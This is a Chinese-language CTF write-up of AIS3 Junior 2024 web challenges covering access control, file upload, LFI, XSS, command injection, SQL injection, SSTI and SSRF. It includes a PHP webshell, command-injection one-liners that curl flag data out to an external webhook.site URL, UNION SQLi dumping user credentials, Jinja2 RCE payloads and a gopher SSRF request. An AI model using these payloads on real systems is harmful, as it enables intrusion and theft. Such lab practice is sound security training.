AIS3 Junior 2024 - Web Security Walkthrough

wang

2024-08-18

AIS3 Junior, CTF

題解的最多 writeup寫得最累
alt text

01 - Broken Access Control

BAC01
1. 測試正常輸入
  
  關鍵字 user permission
  path /user
2. 資訊蒐集，cookie、封包heaer、頁原原始碼… => 無線索
3. 試著往簡單的方向想 => 回想 1. => 有 user permission、path… 那應該有 ==admin== permission、path ?!
4. 測試path /admin
BAC02
1. 注意到Admin Panel => 很顯然這是目標
  
  比起上題，多了 Product List => 可能有線索
2. 檢查 Product List 頁面原始碼
  
  少了goToProductPage(4) ?
3. 嘗試到ProductPage(4)
  隨便點進一個
  
  改成 /product/4
  
  點 Buy
BAC03
1. 做基本資訊蒐集
  檢查頁面原始碼、cookie、封包header、正常輸入… => 無線索 => 跟第一題好像
2. 試 /admin => 沒像第一題到 /admin 而是 /error
  
  中間發生什麼?
3. 開burp suite重複同樣操作
  
  一樣
  
  中間有 /admin !
4. 查看 /admin

02 - File Upload

FIL01
1. 寫最簡單又不會被windows當作惡意檔案刪掉的 websell
  1
  2
  3
  4
  <?php
  $a=$_GET['cmd'];
  system($a.'; echo meow');
  ?>
2. 選擇 websell.php
  
  再上傳
3. 上傳成功
  
  不確有沒有上傳成功 => 加參數
  
  RCE !
FIL02
1. 上傳上題的websell => 有 waf
2. 在 burp suite 上傳，攔截封包
  
  送到 reapeter
3. 修改封包
  - bypass filename
    猜測要有png
    php 放後面使檔案可被當php執行
    改成
  - bypass Content-Type
    改成像正常圖片
4. 送出修改後封包
  
  RCE !
FIL03
1. 在 burp suite 做跟上一題同樣步驟 => 上傳失敗
2. bypass file header
  在 burp suite 上傳一張正常的圖片，攔截封包
  
  保留圖片頭尾，在中間塞webshell
  
  上傳失敗
3. bypass filename
  猜測可能不能出現php，png被允許
  改成 png.phar
  因為phar 相當於php

03 - Local File Inclusion

LFI01
1. 瀏覽網頁看到圖片
2. 猜測static/bitcoinCat.jpg會被include
  
  嘗試include index.php
3. base64 decode 看 index.php source code
4. 嘗試登入
LFI02
1. 看到上傳功能，嘗試上傳沒有bypass waf 的websell
2. 猜測是要include剛上傳的websell
  看到上傳頁面有
  
  猜測 form.html 會被 include
  
  RCE !
LFI03
1. 跟LFI01一樣有圖片，做一樣的嘗試
  
  但不成功
2. 回登入頁面檢視網頁原始碼
3. 第三題，總該RCE了吧?
  githubg上有現成的超長RCE payload
  
  複製雙引號內的內容
  
  貼上
  
  RCE !

04 - Cross-Site Scripting

XSS01
1. 從網也原始碼得知要alert const FLAG
2. 發現會輸出URL參數
3. XSS

05 - Command Injection

CMD01
1. 測試正常的輸入
2. 做最簡單的cmd injection
  
  RCE !
CMD02
1. 嘗試跟上一題一樣的
  
  單獨測試空格、分號、ls => 會過濾 ls
2. bypass 特定指令
  在指令中間塞 \ 仍可執行
  
  RCE !
CMD03
1. 嘗試
  
  單獨測試空格、分號、ls => 會過濾空格、分號
2. bypass 分號
  利用 “$()”
  
  RCE !
3. bypass 空格
  用 ${IFS} 代替空格
CMD04
1. 測試正常輸入
  
  只會回傳有沒有執行成功 => 試圖將執行結果往外傳
2. 測試黑名單
  單獨測試空格、分號、ls、$、雙引號
  => 過濾空格、分號、ls
3. 開 webhook.site 準備接收封包
4. 利用 curl 將結果送到 webkook ，並bypass 分號、空格
  1
  8.8.8.8"$(cu\rl${IFS}https://webhook.site/d53be48c-03c9-4b61-bb18-63d3ce9afffd${IFS}--data${IFS}"$(l\s)")"
  RCE !
5. 取得flag
  1
  8.8.8.8"$(cu\rl${IFS}https://webhook.site/d53be48c-03c9-4b61-bb18-63d3ce9afffd${IFS}--data${IFS}"$(c\at${IFS}ERRORCMDi_FLAG)")"

CMD05

用上一題payload試

1	8.8.8.8"$(cu\rl${IFS}https://webhook.site/d53be48c-03c9-4b61-bb18-63d3ce9afffd${IFS}--data${IFS}"$(l\s)")"

RCE !

取得flag

1	8.8.8.8"$(cu\rl${IFS}https://webhook.site/d53be48c-03c9-4b61-bb18-63d3ce9afffd${IFS}--data${IFS}"$(c\at${IFS}BLindCMDiFLAG)")"

[Bonus] CMD06
1. 檢查黑名單
  單獨輸入空白、$()、``、””、ls
  => 過濾空白、””、ls
2. bypass “”
  嘗試用``代替”$()”發現好像只能輸出一行
  
  輸出一行那輸出flag好像也夠了?flag的檔名先猜個 F*

06 - SQL Injection

SQL01
1. 帳號填 admin’ or 1=1 的變化多試幾個，密碼隨意填
2. 試出來了

SQL02
~~對因為要當好駭客不當腳本小子我要來手戳~~

確定可以SQLi

union base

1	a' union select schema_name from `information_schema`.`schemata` -- -

試幾個欄位

a' union select 1, schema_name from `information_schema`.`schemata` -- -
1222 (21000): The used SELECT statements have a different number of columns
a' union select 1, 2, schema_name from `information_schema`.`schemata` -- -
1222 (21000): The used SELECT statements have a different number of columns

取得 DB name
1
a' union select 1, 2, 3, schema_name from `information_schema`.`schemata` -- -
應該在 ApexPredators DB 找ApexPredators DataCenter Portal 的管理者帳密

取得table name

1	a' union select 1, 2, 3, table_name from `information_schema`.`tables` where table_schema='ApexPredators' -- -

取得 column name

1	a' union select 1, 2, 3, column_name from `information_schema`.`columns` where table_name='users' -- -

取得 data

1	a' union select 1, username, password, isAdmin from `ApexPredators`.`users` -- -

找到admin

登入admin

SQL03

嘗試黑名單 => 過濾空格、– -
bypass 空格 => 空格一律用/**/代替
bypass – - => 註解用 # 代替

跟上題一樣登入步驟

1	a'//union//select//1,//2,//3,//schema_name//from//`information_schema`.`schemata`/**/#

1	a'//union//select//1,//2,//3,//table_name//from//`information_schema`.`tables`//where//table_schema='ApexPredators'/**/#

1	a'//union//select//1,//2,//3,//column_name//from//`information_schema`.`columns`//where//table_name='users'/**/#

1	a'//union//select//1,//username,//password,//isAdmin//from//`ApexPredators`.`users`/**/#

登入admin

07 - Server-Side Template Injection

STI01
1. 確認模板
  
  => 可以猜 Jinja2 (Python)
2. 用hacktricks的payload
  1
  {{ cycler.__init__.__globals__.os.popen('id').read() }}
  RCE !
STI02
1. 嘗試貼上題的payload
2. RCE !
3. 取得flag

STI03

檢查黑名單 => 過濾 {{ }}、[]

用hacktricks的payload

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()%}{%print(a)%}{%endwith%}

RCE !

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat FLAG')|attr('read')()%}{%print(a)%}{%endwith%}

08 - Server-Side Request Forgery

SRF01
1. 用 file:// 讀取 /app/FLAG
2. 看圖片原始碼
3. base64 decode
SRF02
1. 注意到 ADMIN PANEL 在 /local
2. 嘗試最基本payload
3. base64 decode
SRF03
1. 測試黑名單 => 過濾 localhost、127.0.0.1
2. bypass
  將127.0.0.1轉成十六進制
3. base64 decode

SRF04

測試黑名單 => localhost、127.0.0.1
- bypass => gopher://0

製作gopher POST封包

gopher://0:80_
POST%20/local%20HTTP/1.1%0D%0A
Host:%20127.0.0.1%0D%0A
Content-Type:%20application/x-www-form-urlencoded%0d%0A
Content-Length:%2032%0d%0A
%0D%0A
username=admin&password=password

1	gopher://0:80/_POST%20/local%20HTTP/1.1%0D%0AHost:127.0.0.1%0D%0AContent-Type:%20application/x-www-form-urlencoded%0d%0AContent-Length:%2032%0d%0A%0D%0Ausername=admin&password=password

送出封包